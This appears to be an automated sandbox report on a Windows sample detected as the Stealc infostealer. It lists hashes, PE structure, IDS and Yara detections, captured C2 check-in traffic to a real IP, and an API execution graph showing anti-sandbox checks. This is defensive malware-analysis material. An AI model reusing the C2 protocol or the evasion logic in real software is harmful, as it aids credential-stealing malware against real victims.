                        SHA1:1f3d8bf70d7cda5a72b8f6c7ddbff264e5a2bbf0
                        SHA256:0135c24488681db4642d0052513db7a8a11658c8ee26ec1f31947f3bf0d897cf
                        SHA512:b4ce703029bcad01c76bea65df3059556c8b5ac0a2ec9e51ef8f89ddce5480363a04d62a89b714a04433db6486fcae22d804558f7c64474089a1dc210c3bcace
                        SSDEEP:24576:Qhv87VldnWvuRbgBQHtYlwGqSvDDFNxaiKJ8PUFn+SlUQIWnzref:3ldnWPktY8SL5NxgJ8PMtlSqif
                        TLSH:57853367697E4E11CB48F6B0C57F27132C286B12694E9E1E4216FA363337B2560C6DCD
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                        File Icon

                        Icon Hash:00928e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0xa7c000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                        Entrypoint Preview

                        Instruction
                        jmp 00007F6C156086AAh
                        cmove ebx, dword ptr [ebx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add cl, ch
                        add byte ptr [eax], ah
                        add byte ptr [eax], al
                        add byte ptr [0000000Ah], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dl
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [edx+ecx], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        or al, 80h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add eax, 0000000Ah
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax+eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        and al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        or byte ptr [eax+00000000h], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add eax, 0000000Ah
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [edi], bl
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], al
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add eax, 0000000Ah
                        add byte ptr [eax], al
                        add byte ptr [eax], dl
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ebx], al
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], cl
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Rich Headers

                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x25b0000x228005dde76c1d6e6e8d73b4ec71aadc3c05cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        0x25e0000x28c0000x2001e34a1cba19de0940f9f76bdee432b36unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        xyustrqz0x4ea0000x1910000x19020015f75dc636308d1ac1da166f9231294eFalse0.9945280771633864data7.9524401943159875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        fcgrwzmi0x67b0000x10000x6001a1994f520becd0a5cc029a604d08011False0.6048177083333334data5.170289190478538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant0x67c0000x30000x2200f08fa920b758f81f4a7d8fa8699404e9False0.060546875DOS executable (COM)0.7386290318181228IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                        Imports

                        DLLImport
                        kernel32.dlllstrcpy

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-10-25T10:27:03.731223+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 25, 2024 10:27:02.514128923 CEST4970480192.168.2.5185.215.113.37
                        Oct 25, 2024 10:27:02.519546986 CEST8049704185.215.113.37192.168.2.5
                        Oct 25, 2024 10:27:02.519628048 CEST4970480192.168.2.5185.215.113.37
                        Oct 25, 2024 10:27:02.519798994 CEST4970480192.168.2.5185.215.113.37
                        Oct 25, 2024 10:27:02.525171995 CEST8049704185.215.113.37192.168.2.5
                        Oct 25, 2024 10:27:03.438963890 CEST8049704185.215.113.37192.168.2.5
                        Oct 25, 2024 10:27:03.439150095 CEST4970480192.168.2.5185.215.113.37
                        Oct 25, 2024 10:27:03.443002939 CEST4970480192.168.2.5185.215.113.37
                        Oct 25, 2024 10:27:03.448527098 CEST8049704185.215.113.37192.168.2.5
                        Oct 25, 2024 10:27:03.731108904 CEST8049704185.215.113.37192.168.2.5
                        Oct 25, 2024 10:27:03.731223106 CEST4970480192.168.2.5185.215.113.37
                        Oct 25, 2024 10:27:06.308478117 CEST4970480192.168.2.5185.215.113.37

                        HTTP Request Dependency Graph

                        • 185.215.113.37

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.549704185.215.113.37805464C:\Users\user\Desktop\file.exe
                        TimestampBytes transferredDirectionData
                        Oct 25, 2024 10:27:02.519798994 CEST89OUTGET / HTTP/1.1
                        Host: 185.215.113.37
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Oct 25, 2024 10:27:03.438963890 CEST203INHTTP/1.1 200 OK
                        Date: Fri, 25 Oct 2024 08:27:03 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Oct 25, 2024 10:27:03.443002939 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJD
                        Host: 185.215.113.37
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 33 39 36 34 45 42 38 31 34 39 37 33 33 37 30 38 35 37 36 34 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 2d 2d 0d 0a
                        Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="hwid"D3964EB814973370857647------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="build"doma------AKKECAFBFHJDGDHIEHJD--
                        Oct 25, 2024 10:27:03.731108904 CEST210INHTTP/1.1 200 OK
                        Date: Fri, 25 Oct 2024 08:27:03 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        System Behavior

                        General

                        Target ID:0
                        Start time:04:26:58
                        Start date:25/10/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0xbf0000
                        File size:1'795'584 bytes
                        MD5 hash:C1DCD48EB2E8B81DFAC6E6C4B33A4CEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2112766908.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2072045799.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:7.7%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:10.1%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:24
                          execution_graph 13609 c069f0 13654 bf2260 13609->13654 13633 c06a64 13634 c0a9b0 4 API calls 13633->13634 13635 c06a6b 13634->13635 13636 c0a9b0 4 API calls 13635->13636 13637 c06a72 13636->13637 13638 c0a9b0 4 API calls 13637->13638 13639 c06a79 13638->13639 13640 c0a9b0 4 API calls 13639->13640 13641 c06a80 13640->13641 13806 c0a8a0 13641->13806 13643 c06b0c 13810 c06920 GetSystemTime 13643->13810 13645 c06a89 13645->13643 13647 c06ac2 OpenEventA 13645->13647 13649 c06af5 CloseHandle Sleep 13647->13649 13650 c06ad9 13647->13650 13651 c06b0a 13649->13651 13653 c06ae1 CreateEventA 13650->13653 13651->13645 13653->13643 14007 bf45c0 13654->14007 13656 bf2274 13657 bf45c0 2 API calls 13656->13657 13658 bf228d 13657->13658 13659 bf45c0 2 API calls 13658->13659 13660 bf22a6 13659->13660 13661 bf45c0 2 API calls 13660->13661 13662 bf22bf 13661->13662 13663 bf45c0 2 API calls 13662->13663 13664 bf22d8 13663->13664 13665 bf45c0 2 API calls 13664->13665 13666 bf22f1 13665->13666 13667 bf45c0 2 API calls 13666->13667 13668 bf230a 13667->13668 13669 bf45c0 2 API calls 13668->13669 13670 bf2323 13669->13670 13671 bf45c0 2 API calls 13670->13671 13672 bf233c 13671->13672 13673 bf45c0 2 API calls 13672->13673 13674 bf2355 13673->13674 13675 bf45c0 2 API calls 13674->13675 13676 bf236e 13675->13676 13677 bf45c0 2 API calls 13676->13677 13678 bf2387 13677->13678 13679 bf45c0 2 API calls 13678->13679 13680 bf23a0 13679->13680 13681 bf45c0 2 API calls 13680->13681 13682 bf23b9 13681->13682 13683 bf45c0 2 API calls 13682->13683 13684 bf23d2 13683->13684 13685 bf45c0 2 API calls 13684->13685 13686 bf23eb 13685->13686 13687 bf45c0 2 API calls 13686->13687 13688 bf2404 13687->13688 13689 bf45c0 2 API calls 13688->13689 13690 bf241d 13689->13690 13691 bf45c0 2 API calls 13690->13691 13692 bf2436 13691->13692 13693 bf45c0 2 API calls 13692->13693 13694 bf244f 13693->13694 13695 bf45c0 2 API calls 13694->13695 13696 bf2468 13695->13696 13697 bf45c0 2 API calls 13696->13697 13698 bf2481 13697->13698 13699 bf45c0 2 API calls 13698->13699 13700 bf249a 13699->13700 13701 bf45c0 2 API calls 13700->13701 13702 bf24b3 13701->13702 13703 bf45c0 2 API calls 13702->13703 13704 bf24cc 13703->13704 13705 bf45c0 2 API calls 13704->13705 13706 bf24e5 13705->13706 13707 bf45c0 2 API calls 13706->13707 13708 bf24fe 13707->13708 13709 bf45c0 2 API calls 13708->13709 13710 bf2517 13709->13710 13711 bf45c0 2 API calls 13710->13711 13712 bf2530 13711->13712 13713 bf45c0 2 API calls 13712->13713 13714 bf2549 13713->13714 13715 bf45c0 2 API calls 13714->13715 13716 bf2562 13715->13716 13717 bf45c0 2 API calls 13716->13717 13718 bf257b 13717->13718 13719 bf45c0 2 API calls 13718->13719 13720 bf2594 13719->13720 13721 bf45c0 2 API calls 13720->13721 13722 bf25ad 13721->13722 13723 bf45c0 2 API calls 13722->13723 13724 bf25c6 13723->13724 13725 bf45c0 2 API calls 13724->13725 13726 bf25df 13725->13726 13727 bf45c0 2 API calls 13726->13727 13728 bf25f8 13727->13728 13729 bf45c0 2 API calls 13728->13729 13730 bf2611 13729->13730 13731 bf45c0 2 API calls 13730->13731 13732 bf262a 13731->13732 13733 bf45c0 2 API calls 13732->13733 13734 bf2643 13733->13734 13735 bf45c0 2 API calls 13734->13735 13736 bf265c 13735->13736 13737 bf45c0 2 API calls 13736->13737 13738 bf2675 13737->13738 13739 bf45c0 2 API calls 13738->13739 13740 bf268e 13739->13740 13741 c09860 13740->13741 14012 c09750 GetPEB 13741->14012 13743 c09868 13744 c09a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13743->13744 13745 c0987a 13743->13745 13746 c09af4 GetProcAddress 13744->13746 13747 c09b0d 13744->13747 13748 c0988c 21 API calls 13745->13748 13746->13747 13749 c09b46 13747->13749 13750 c09b16 GetProcAddress GetProcAddress 13747->13750 13748->13744 13751 c09b68 13749->13751 13752 c09b4f GetProcAddress 13749->13752 13750->13749 13753 c09b71 GetProcAddress 13751->13753 13754 c09b89 13751->13754 13752->13751 13753->13754 13755 c06a00 13754->13755 13756 c09b92 GetProcAddress GetProcAddress 13754->13756 13757 c0a740 13755->13757 13756->13755 13758 c0a750 13757->13758 13759 c06a0d 13758->13759 13760 c0a77e lstrcpy 13758->13760 13761 bf11d0 13759->13761 13760->13759 13762 bf11e8 13761->13762 13763 bf120f ExitProcess 13762->13763 13764 bf1217 13762->13764 13765 bf1160 GetSystemInfo 13764->13765 13766 bf117c ExitProcess 13765->13766 13767 bf1184 13765->13767 13768 bf1110 GetCurrentProcess VirtualAllocExNuma 13767->13768 13769 bf1149 13768->13769 13770 bf1141 ExitProcess 13768->13770 14013 bf10a0 VirtualAlloc 13769->14013 13773 bf1220 14017 c089b0 13773->14017 13776 bf129a 13779 c06770 GetUserDefaultLangID 13776->13779 13777 bf1249 13777->13776 13778 bf1292 ExitProcess 13777->13778 13780 c06792 13779->13780 13781 c067d3 13779->13781 13780->13781 13782 c067c1 ExitProcess 13780->13782 13783 c067a3 ExitProcess 13780->13783 13784 c067b7 ExitProcess 13780->13784 13785 c067cb ExitProcess 13780->13785 13786 c067ad ExitProcess 13780->13786 13787 bf1190 13781->13787 13785->13781 13788 c078e0 3 API calls 13787->13788 13789 bf119e 13788->13789 13790 bf11cc 13789->13790 13791 c07850 3 API calls 13789->13791 13794 c07850 GetProcessHeap RtlAllocateHeap GetUserNameA 13790->13794 13792 bf11b7 13791->13792 13792->13790 13793 bf11c4 ExitProcess 13792->13793 13795 c06a30 13794->13795 13796 c078e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13795->13796 13797 c06a43 13796->13797 13798 c0a9b0 13797->13798 14019 c0a710 13798->14019 13800 c0a9c1 lstrlen 13803 c0a9e0 13800->13803 13801 c0aa18 14020 c0a7a0 13801->14020 13803->13801 13804 c0a9fa lstrcpy lstrcat 13803->13804 13804->13801 13805 c0aa24 13805->13633 13807 c0a8bb 13806->13807 13808 c0a90b 13807->13808 13809 c0a8f9 lstrcpy 13807->13809 13808->13645 13809->13808 14024 c06820 13810->14024 13812 c0698e 13813 c06998 sscanf 13812->13813 14053 c0a800 13813->14053 13815 c069aa SystemTimeToFileTime SystemTimeToFileTime 13816 c069e0 13815->13816 13817 c069ce 13815->13817 13819 c05b10 13816->13819 13817->13816 13818 c069d8 ExitProcess 13817->13818 13820 c05b1d 13819->13820 13821 c0a740 lstrcpy 13820->13821 13822 c05b2e 13821->13822 14055 c0a820 lstrlen 13822->14055 13825 c0a820 2 API calls 13826 c05b64 13825->13826 13827 c0a820 2 API calls 13826->13827 13828 c05b74 13827->13828 14059 c06430 13828->14059 13831 c0a820 2 API calls 13832 c05b93 13831->13832 13833 c0a820 2 API calls 13832->13833 13834 c05ba0 13833->13834 13835 c0a820 2 API calls 13834->13835 13836 c05bad 13835->13836 13837 c0a820 2 API calls 13836->13837 13838 c05bf9 13837->13838 14068 bf26a0 13838->14068 13846 c05cc3 13847 c06430 lstrcpy 13846->13847 13848 c05cd5 13847->13848 13849 c0a7a0 lstrcpy 13848->13849 13850 c05cf2 13849->13850 13851 c0a9b0 4 API calls 13850->13851 13852 c05d0a 13851->13852 13853 c0a8a0 lstrcpy 13852->13853 13854 c05d16 13853->13854 13855 c0a9b0 4 API calls 13854->13855 13856 c05d3a 13855->13856 13857 c0a8a0 lstrcpy 13856->13857 13858 c05d46 13857->13858 13859 c0a9b0 4 API calls 13858->13859 13860 c05d6a 13859->13860 13861 c0a8a0 lstrcpy 13860->13861 13862 c05d76 13861->13862 13863 c0a740 lstrcpy 13862->13863 13864 c05d9e 13863->13864 14794 c07500 GetWindowsDirectoryA 13864->14794 13867 c0a7a0 lstrcpy 13868 c05db8 13867->13868 14804 bf4880 13868->14804 13870 c05dbe 14949 c017a0 13870->14949 13872 c05dc6 13873 c0a740 lstrcpy 13872->13873 13874 c05de9 13873->13874 13875 bf1590 lstrcpy 13874->13875 13876 c05dfd 13875->13876 14965 bf5960 13876->14965 13878 c05e03 15109 c01050 13878->15109 13880 c05e0e 13881 c0a740 lstrcpy 13880->13881 13882 c05e32 13881->13882 13883 bf1590 lstrcpy 13882->13883 13884 c05e46 13883->13884 13885 bf5960 34 API calls 13884->13885 13886 c05e4c 13885->13886 15113 c00d90 13886->15113 13888 c05e57 13889 c0a740 lstrcpy 13888->13889 13890 c05e79 13889->13890 13891 bf1590 lstrcpy 13890->13891 13892 c05e8d 13891->13892 13893 bf5960 34 API calls 13892->13893 13894 c05e93 13893->13894 15120 c00f40 13894->15120 13896 c05e9e 13897 bf1590 lstrcpy 13896->13897 13898 c05eb5 13897->13898 15125 c01a10 13898->15125 13900 c05eba 13901 c0a740 lstrcpy 13900->13901 13902 c05ed6 13901->13902 15469 bf4fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13902->15469 13904 c05edb 13905 bf1590 lstrcpy 13904->13905 13906 c05f5b 13905->13906 15476 c00740 13906->15476 13908 c05f60 13909 c0a740 lstrcpy 13908->13909 13910 c05f86 13909->13910 13911 bf1590 lstrcpy 13910->13911 13912 c05f9a 13911->13912 13913 bf5960 34 API calls 13912->13913 13914 c05fa0 13913->13914 14008 bf45d1 RtlAllocateHeap 14007->14008 14011 bf4621 VirtualProtect 14008->14011 14011->13656 14012->13743 14014 bf10c2 codecvt 14013->14014 14015 bf10fd 14014->14015 14016 bf10e2 VirtualFree 14014->14016 14015->13773 14016->14015 14018 bf1233 GlobalMemoryStatusEx 14017->14018 14018->13777 14019->13800 14021 c0a7c2 14020->14021 14022 c0a7ec 14021->14022 14023 c0a7da lstrcpy 14021->14023 14022->13805 14023->14022 14025 c0a740 lstrcpy 14024->14025 14026 c06833 14025->14026 14027 c0a9b0 4 API calls 14026->14027 14028 c06845 14027->14028 14029 c0a8a0 lstrcpy 14028->14029 14030 c0684e 14029->14030 14031 c0a9b0 4 API calls 14030->14031 14032 c06867 14031->14032 14033 c0a8a0 lstrcpy 14032->14033 14034 c06870 14033->14034 14035 c0a9b0 4 API calls 14034->14035 14036 c0688a 14035->14036 14037 c0a8a0 lstrcpy 14036->14037 14038 c06893 14037->14038 14039 c0a9b0 4 API calls 14038->14039 14040 c068ac 14039->14040 14041 c0a8a0 lstrcpy 14040->14041 14042 c068b5 14041->14042 14043 c0a9b0 4 API calls 14042->14043 14044 c068cf 14043->14044 14045 c0a8a0 lstrcpy 14044->14045 14046 c068d8 14045->14046 14047 c0a9b0 4 API calls 14046->14047 14048 c068f3 14047->14048 14049 c0a8a0 lstrcpy 14048->14049 14050 c068fc 14049->14050 14051 c0a7a0 lstrcpy 14050->14051 14052 c06910 14051->14052 14052->13812 14054 c0a812 14053->14054 14054->13815 14056 c0a83f 14055->14056 14057 c05b54 14056->14057 14058 c0a87b lstrcpy 14056->14058 14057->13825 14058->14057 14060 c0a8a0 lstrcpy 14059->14060 14061 c06443 14060->14061 14062 c0a8a0 lstrcpy 14061->14062 14063 c06455 14062->14063 14064 c0a8a0 lstrcpy 14063->14064 14065 c06467 14064->14065 14066 c0a8a0 lstrcpy 14065->14066 14067 c05b86 14066->14067 14067->13831 14069 bf45c0 2 API calls 14068->14069 14070 bf26b4 14069->14070 14071 bf45c0 2 API calls 14070->14071 14072 bf26d7 14071->14072 14073 bf45c0 2 API calls 14072->14073 14074 bf26f0 14073->14074 14075 bf45c0 2 API calls 14074->14075 14076 bf2709 14075->14076 14077 bf45c0 2 API calls 14076->14077 14078 bf2736 14077->14078 14079 bf45c0 2 API calls 14078->14079 14080 bf274f 14079->14080 14081 bf45c0 2 API calls 14080->14081 14082 bf2768 14081->14082 14083 bf45c0 2 API calls 14082->14083 14084 bf2795 14083->14084 14085 bf45c0 2 API calls 14084->14085 14086 bf27ae 14085->14086 14087 bf45c0 2 API calls 14086->14087 14088 bf27c7 14087->14088 14089 bf45c0 2 API calls 14088->14089 14090 bf27e0 14089->14090 14091 bf45c0 2 API calls 14090->14091 14092 bf27f9 14091->14092 14093 bf45c0 2 API calls 14092->14093 14094 bf2812 14093->14094 14095 bf45c0 2 API calls 14094->14095 14096 bf282b 14095->14096 14097 bf45c0 2 API calls 14096->14097 14098 bf2844 14097->14098 14099 bf45c0 2 API calls 14098->14099 14100 bf285d 14099->14100 14101 bf45c0 2 API calls 14100->14101 14102 bf2876 14101->14102 14103 bf45c0 2 API calls 14102->14103 14104 bf288f 14103->14104 14105 bf45c0 2 API calls 14104->14105 14106 bf28a8 14105->14106 14107 bf45c0 2 API calls 14106->14107 14108 bf28c1 14107->14108 14109 bf45c0 2 API calls 14108->14109 14110 bf28da 14109->14110 14111 bf45c0 2 API calls 14110->14111 14112 bf28f3 14111->14112 14113 bf45c0 2 API calls 14112->14113 14114 bf290c 14113->14114 14115 bf45c0 2 API calls 14114->14115 14116 bf2925 14115->14116 14117 bf45c0 2 API calls 14116->14117 14118 bf293e 14117->14118 14119 bf45c0 2 API calls 14118->14119 14120 bf2957 14119->14120 14121 bf45c0 2 API calls 14120->14121 14122 bf2970 14121->14122 14123 bf45c0 2 API calls 14122->14123 14124 bf2989 14123->14124 14125 bf45c0 2 API calls 14124->14125 14126 bf29a2 14125->14126 14127 bf45c0 2 API calls 14126->14127 14128 bf29bb 14127->14128 14129 bf45c0 2 API calls 14128->14129 14130 bf29d4 14129->14130 14131 bf45c0 2 API calls 14130->14131 14132 bf29ed 14131->14132 14133 bf45c0 2 API calls 14132->14133 14134 bf2a06 14133->14134 14135 bf45c0 2 API calls 14134->14135 14136 bf2a1f 14135->14136 14137 bf45c0 2 API calls 14136->14137 14138 bf2a38 14137->14138 14139 bf45c0 2 API calls 14138->14139 14140 bf2a51 14139->14140 14141 bf45c0 2 API calls 14140->14141 14142 bf2a6a 14141->14142 14143 bf45c0 2 API calls 14142->14143 14144 bf2a83 14143->14144 14145 bf45c0 2 API calls 14144->14145 14146 bf2a9c 14145->14146 14147 bf45c0 2 API calls 14146->14147 14148 bf2ab5 14147->14148 14149 bf45c0 2 API calls 14148->14149 14150 bf2ace 14149->14150 14151 bf45c0 2 API calls 14150->14151 14152 bf2ae7 14151->14152 14153 bf45c0 2 API calls 14152->14153 14154 bf2b00 14153->14154 14155 bf45c0 2 API calls 14154->14155 14156 bf2b19 14155->14156 14157 bf45c0 2 API calls 14156->14157 14158 bf2b32 14157->14158 14159 bf45c0 2 API calls 14158->14159 14160 bf2b4b 14159->14160 14161 bf45c0 2 API calls 14160->14161 14162 bf2b64 14161->14162 14163 bf45c0 2 API calls 14162->14163 14164 bf2b7d 14163->14164 14165 bf45c0 2 API calls 14164->14165 14166 bf2b96 14165->14166 14167 bf45c0 2 API calls 14166->14167 14168 bf2baf 14167->14168 14169 bf45c0 2 API calls 14168->14169 14170 bf2bc8 14169->14170 14171 bf45c0 2 API calls 14170->14171 14172 bf2be1 14171->14172 14173 bf45c0 2 API calls 14172->14173 14174 bf2bfa 14173->14174 14175 bf45c0 2 API calls 14174->14175 14176 bf2c13 14175->14176 14177 bf45c0 2 API calls 14176->14177 14178 bf2c2c 14177->14178 14179 bf45c0 2 API calls 14178->14179 14180 bf2c45 14179->14180 14181 bf45c0 2 API calls 14180->14181 14182 bf2c5e 14181->14182 14183 bf45c0 2 API calls 14182->14183 14184 bf2c77 14183->14184 14185 bf45c0 2 API calls 14184->14185 14186 bf2c90 14185->14186 14187 bf45c0 2 API calls 14186->14187 14188 bf2ca9 14187->14188 14189 bf45c0 2 API calls 14188->14189 14190 bf2cc2 14189->14190 14191 bf45c0 2 API calls 14190->14191 14192 bf2cdb 14191->14192 14193 bf45c0 2 API calls 14192->14193 14194 bf2cf4 14193->14194 14195 bf45c0 2 API calls 14194->14195 14196 bf2d0d 14195->14196 14197 bf45c0 2 API calls 14196->14197 14198 bf2d26 14197->14198 14199 bf45c0 2 API calls 14198->14199 14200 bf2d3f 14199->14200 14201 bf45c0 2 API calls 14200->14201 14202 bf2d58 14201->14202 14203 bf45c0 2 API calls 14202->14203 14204 bf2d71 14203->14204 14205 bf45c0 2 API calls 14204->14205 14206 bf2d8a 14205->14206 14207 bf45c0 2 API calls 14206->14207 14208 bf2da3 14207->14208 14209 bf45c0 2 API calls 14208->14209 14210 bf2dbc 14209->14210 14211 bf45c0 2 API calls 14210->14211 14212 bf2dd5 14211->14212 14213 bf45c0 2 API calls 14212->14213 14214 bf2dee 14213->14214 14215 bf45c0 2 API calls 14214->14215 14216 bf2e07 14215->14216 14217 bf45c0 2 API calls 14216->14217 14218 bf2e20 14217->14218 14219 bf45c0 2 API calls 